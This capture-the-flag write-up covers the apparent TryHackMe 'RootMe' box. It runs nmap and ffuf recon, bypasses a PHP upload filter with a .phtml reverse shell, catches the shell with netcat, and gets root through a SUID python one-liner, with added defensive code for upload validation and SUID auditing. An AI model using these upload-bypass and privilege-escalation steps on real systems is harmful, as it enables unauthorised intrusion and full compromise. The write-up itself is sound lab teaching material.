![[Pasted image 20250629130650.png]]
# Information Gathering - Nmap
Scanned all 65,535 TCP ports and found two open ports: 22 and 80.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p-
[sudo] password for parallels:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-29 12:35 CDT
Nmap scan report for 10.10.225.13
Host is up (0.13s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 23.14 seconds
```
Ran another scan, this time with the `-sC` and `-sV` options, to get more detailed information about those two open ports.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sC -sV $IP -p 22,80
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-29 12:36 CDT
Nmap scan report for 10.10.225.13
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
| 256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_ 256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HackIT - Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.76 seconds
```
Lastly, I performed a UDP scan against the top 1,000 ports but found no open ports.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sU $IP --min-rate 3000 --top-ports 1000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-29 12:38 CDT
Nmap scan report for 10.10.225.13
Host is up (0.13s latency).
Not shown: 994 open|filtered udp ports (no-response)
PORT STATE SERVICE
207/udp closed at-7
1059/udp closed nimreg
19541/udp closed jcp
21902/udp closed unknown
49194/udp closed unknown
62699/udp closed unknown
Nmap done: 1 IP address (1 host up) scanned in 1.39 seconds
```
---
# Footprinting
##### Port 80
I opened up my browser to see the web page on port 80. Below is all I saw. I couldn't find any useful information.
![[Pasted image 20250629123951.png]]
I used `ffuf` to enumerate directories and this directory named `panel` stood out to me.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ ffuf -u http://$IP/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -c -ac
        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.225.13/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

.htaccessZhUoKYjp [Status: 200, Size: 616, Words: 115, Lines: 26, Duration: 131ms]
<SNIP>
uploads [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 239ms]
<SNIP>
css [Status: 301, Size: 310, Words: 20, Lines: 10, Duration: 128ms]
js [Status: 301, Size: 309, Words: 20, Lines: 10, Duration: 127ms]
panel [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 128ms]
```
The `/panel` page appears to be a place where files can be uploaded. ffuf also found an `/uploads` directory, and I suspect that files uploaded through `/panel` are stored in `/uploads`.
![[Pasted image 20250629125019.png]]
I tried uploading Pentest Monkey's `php-reverse-shell.php`, but the web server does not accept `.php` files.
![[Pasted image 20250629125527.png]]
I wasn't sure how strictly the upload filter was enforced at this point, so I changed the file extension from `.php` to `.phtml` and tried uploading it again -- and it worked!
![[Pasted image 20250629125750.png]]
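Why the rename to `.phtml` worked, and what a safer check looks like, as an added example that is not code from the box or from this write-up: Apache's stock PHP module config maps `.php`, `.phtml` and `.phar` to the PHP handler, so an upload filter that rejects only `.php` is bypassed by the other two. The weak check is an assumption about the target's filter logic (its real code was never visible); the hardened allowlist check is the defensive counterpart.

```python
import os
import re
from typing import Optional

# Reconstruction (assumed, not the target's code) of the weak filter the box
# appears to use, beside a hardened allowlist check.

# Apache's default PHP module config (mods-enabled/php*.conf) hands every
# file matching ".+\.ph(ar|p|tml)$" to the PHP engine, so blocking only
# ".php" still lets ".phtml" and ".phar" uploads execute as PHP.
PHP_EXECUTED_EXTS = {"php", "phtml", "phar"}

ALLOWED_EXTS = {"png", "jpg", "jpeg", "gif"}
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}


def blocklist_check(filename: str) -> bool:
    """Weak check: accept anything whose name does not end in '.php'."""
    return not filename.lower().endswith(".php")


def is_php_executed(filename: str) -> bool:
    """True if Apache's stock PHP handler would execute this file name."""
    return "." in filename and filename.lower().rsplit(".", 1)[-1] in PHP_EXECUTED_EXTS


def sniff_type(data: bytes) -> Optional[str]:
    """Identify an image by its leading magic bytes, ignoring the claimed extension."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def allowlist_check(filename: str, data: bytes) -> bool:
    """Hardened check: exactly one allowlisted extension, a safe basename,
    and content whose magic bytes agree with that extension."""
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) != 2:  # rejects "shell.php.png" and extensionless names
        return False
    name, ext = parts
    if not re.fullmatch(r"[a-z0-9_-]{1,64}", name) or ext not in ALLOWED_EXTS:
        return False
    expected = "jpg" if ext == "jpeg" else ext
    return sniff_type(data) == expected
```

Even with the hardened check, the upload directory should be served without a PHP handler (or kept outside the web root) so that a bypass cannot become code execution.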
I browsed to `/uploads` and the file I had just uploaded was there.
![[Pasted image 20250629125827.png]]
Successfully connected to the reverse shell :)
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.23.133.183] from (UNKNOWN) [10.10.225.13] 60002
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
17:58:31 up 25 min, 0 users, load average: 0.00, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
```
Got the `user.txt` flag in `/var/www`.
```bash
www-data@rootme:/var/www$ cat user.txt
THM{y0...
```
---
# Privilege Escalation
To access `/root` and obtain the `root.txt` flag, I needed to elevate my privileges. I looked for files with the `SUID` bit set.
```bash
www-data@rootme:/var/www$ find / -type f -perm -4000 2>/dev/null
<SNIP>
...
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/python
/usr/bin/at
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/pkexec
/snap/core/8268/bin/mount
...
<SNIP>
...
/bin/mount
/bin/su
/bin/fusermount
/bin/ping
/bin/umount
```
`/usr/bin/python` stood out to me: if the Python binary has the SUID bit set, it can be used to spawn a shell as the file's owner, which is an easy route to root. `gtfobins.github.io` confirmed it.
![[Pasted image 20250629130622.png]]
Got the `root.txt` flag!
```bash
www-data@rootme:/var/www$ /usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
# whoami
root
# cd /root
# ls
root.txt
# cat root.txt
THM{pr...
```
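A defender's counterpart to the SUID hunt above, added here and not part of the write-up: an audit that collects SUID-root files, diffs them against a baseline, and flags interpreters such as `/usr/bin/python`, which should never be SUID. The baseline is a constructed subset taken from the `find` output on this page, not a vetted distribution list.

```python
import os
import re
import stat
from typing import Iterable, List, Tuple

# Added audit helper, not from the write-up. A SUID-root interpreter such as
# /usr/bin/python is effectively a setuid shell for every local user.

# Constructed baseline: SUID binaries from this page's `find` output that are
# normally shipped SUID on Ubuntu 18.04. Not a vetted reference list.
BASELINE = {
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/pkexec", "/usr/bin/at",
    "/usr/bin/newuidmap", "/usr/bin/newgidmap", "/bin/su", "/bin/mount",
    "/bin/umount", "/bin/ping", "/bin/fusermount",
}
INTERPRETER_RE = re.compile(r"^(python|perl|ruby|php|node|lua|bash|sh|dash)[0-9.]*$")

Entry = Tuple[str, int, int]  # (path, st_mode, st_uid)


def is_interpreter(path: str) -> bool:
    """Match basenames like python, python3.6, perl5.26; not e.g. shutdown."""
    return INTERPRETER_RE.match(os.path.basename(path)) is not None


def classify(entries: Iterable[Entry]) -> Tuple[List[str], List[str]]:
    """Return (SUID-root files missing from BASELINE, SUID-root interpreters)."""
    unexpected, interps = [], []
    for path, mode, uid in entries:
        if not (stat.S_ISREG(mode) and mode & stat.S_ISUID and uid == 0):
            continue  # ignore non-files, non-SUID, and SUID owned by non-root
        if path not in BASELINE:
            unexpected.append(path)
        if is_interpreter(path):
            interps.append(path)
    return sorted(unexpected), sorted(interps)


def walk_suid(root: str = "/") -> List[Entry]:
    """Equivalent of `find / -type f -perm -4000`: collect SUID regular files."""
    found = []
    for dirpath, _dirs, files in os.walk(root):  # does not follow symlinks
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append((path, st.st_mode, st.st_uid))
    return found
```

Run `classify(walk_suid("/"))` on a host and treat anything in the second list as critical; a stale baseline only produces noise in the first list, never silence in the second.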